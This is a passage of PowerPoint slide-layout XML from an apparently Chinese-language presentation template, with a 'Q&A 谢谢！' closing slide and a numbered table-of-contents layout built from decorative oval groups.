              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A798113D-80E0-473F-B27C-BB3FEC0FF8C3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="r" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>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new结束页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1714500" y="4071938"/>
            <a:ext cx="5357813" cy="1754187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Q&amp;A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" rtl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>　谢　谢！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2051DB36-A1DE-4261-8FB8-D3BE8AE9D50C}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="l" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EEE9F853-36A0-496E-9469-CB48D6628E1F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="r" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>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目录">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Line 128"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2443163" y="45339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4" name="Text Box 129"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2671763" y="4000500"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Line 146"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2466975" y="3533775"/>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6" name="Text Box 147"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2695575" y="3000375"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 148"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1933575" y="3019425"/>
            <a:ext cx="609600" cy="609600"/>
            <a:chOff x="1248" y="1200"/>
            <a:chExt cx="384" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 149"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="1200"/>
              <a:ext cx="384" cy="384"/>
              <a:chOff x="2016" y="912"/>
              <a:chExt cx="384" cy="384"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Text Box 150"/>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11" name="Oval 151"/>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2" name="Oval 152"/>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13" name="Oval 153"/>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4" name="Oval 154"/>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15" name="Oval 155"/>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16" name="Oval 156"/>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7" name="Oval 157"/>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8" name="Oval 158"/>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19" name="Oval 159"/>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9" name="Text Box 160"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line 162"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2490788" y="554513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21" name="Text Box 163"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2719388" y="5011738"/>
            <a:ext cx="4343400" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 164"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1957388" y="5033963"/>
            <a:ext cx="609600" cy="609600"/>
            <a:chOff x="1248" y="1200"/>
            <a:chExt cx="384" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group 165"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="1200"/>
              <a:ext cx="384" cy="384"/>
              <a:chOff x="2016" y="912"/>
              <a:chExt cx="384" cy="384"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2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2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2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2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3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3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3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2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4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Line 162"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2462213" y="2605088"/>
            <a:ext cx="4800600" cy="1587"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 163"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2690813" y="2071688"/>
            <a:ext cx="4343400" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4F81BD">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 164"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1928813" y="2093913"/>
            <a:ext cx="609600" cy="609600"/>
            <a:chOff x="1248" y="1200"/>
            <a:chExt cx="384" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="Group 165"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="1200"/>
              <a:ext cx="384" cy="384"/>
              <a:chOff x="2016" y="912"/>
              <a:chExt cx="384" cy="384"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40"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41"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2"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43"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4"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45"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46"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7"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8"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49"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39"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1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text Box 147"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="2071688"/>
            <a:ext cx="4343400" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 162"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2390775" y="4940300"/>
            <a:ext cx="4800600" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:ea typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 164"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1928813" y="4000500"/>
            <a:ext cx="609600" cy="609600"/>
            <a:chOff x="1248" y="1200"/>
            <a:chExt cx="384" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="53" name="Group 165"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1248" y="1200"/>
              <a:ext cx="384" cy="384"/>
              <a:chOff x="2016" y="912"/>
              <a:chExt cx="384" cy="384"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Text Box 166"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2094" y="960"/>
                <a:ext cx="223" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56" name="Oval 167"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2016" y="912"/>
                <a:ext cx="384" cy="384"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="hlink"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="hlink">
                      <a:gamma/>
                      <a:shade val="46275"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="54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7" name="Oval 168"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2016" y="912"/>
                <a:ext cx="384" cy="384"/>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solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:ea typeface="宋体"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="Oval 169"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2034" y="918"/>
                <a:ext cx="334" cy="33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59" name="Oval 170"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2040" y="936"/>
                <a:ext cx="334" cy="33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solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:ea typeface="宋体"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="60" name="Oval 171"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2052" y="948"/>
                <a:ext cx="300" cy="300"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:ln w="38100" algn="ctr">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="61" name="Oval 172"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2064" y="959"/>
                <a:ext cx="291" cy="291"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="595959"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="C0C0C0"/>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2" name="Oval 173"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2068" y="961"/>
                <a:ext cx="283" cy="283"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="C0C0C0">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="E9E9E9"/>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3" name="Oval 174"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2071" y="963"/>
                <a:ext cx="270" cy="265"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="989898"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="C0C0C0">
                      <a:alpha val="48000"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="64" name="Oval 175"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2086" y="971"/>
                <a:ext cx="240" cy="215"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFFFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="C0C0C0">
                      <a:alpha val="37999"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr vert="eaVert" wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Text Box 176"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="1326" y="1248"/>
